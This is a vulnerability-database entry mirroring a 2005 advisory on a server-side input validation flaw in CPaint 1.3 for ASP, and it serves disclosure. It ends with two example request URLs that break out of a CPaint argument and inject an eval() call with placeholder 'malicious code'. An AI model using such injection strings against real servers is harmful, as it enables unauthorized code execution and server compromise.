CPaint 1.3 - xmlhttp Request Input Validation

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1055337 漏洞类型
发布时间 2005-08-16 更新时间 2005-08-16
CVE编号 N/A CNNVD-ID N/A
漏洞平台 ASP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/26156
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/14577/info

CPAINT is prone to an input validation vulnerability. This issue occurs because the application fails to properly sanitize malicious scripts and requests from user-supplied input.

Successful exploitation of this vulnerability could lead to a compromise of the server running the affected application. Other attacks are also possible. 

calculator.asp?cpaint_function=addNumbers&cpaint_argument[]=1&cpaint_argument[]=2")%20%26%20eval("malicious code

http://someserver.com/cpaintfile.asp?cpaint_function=response.write&cpaint_argument[]=2")%20%26%20eval("malicious code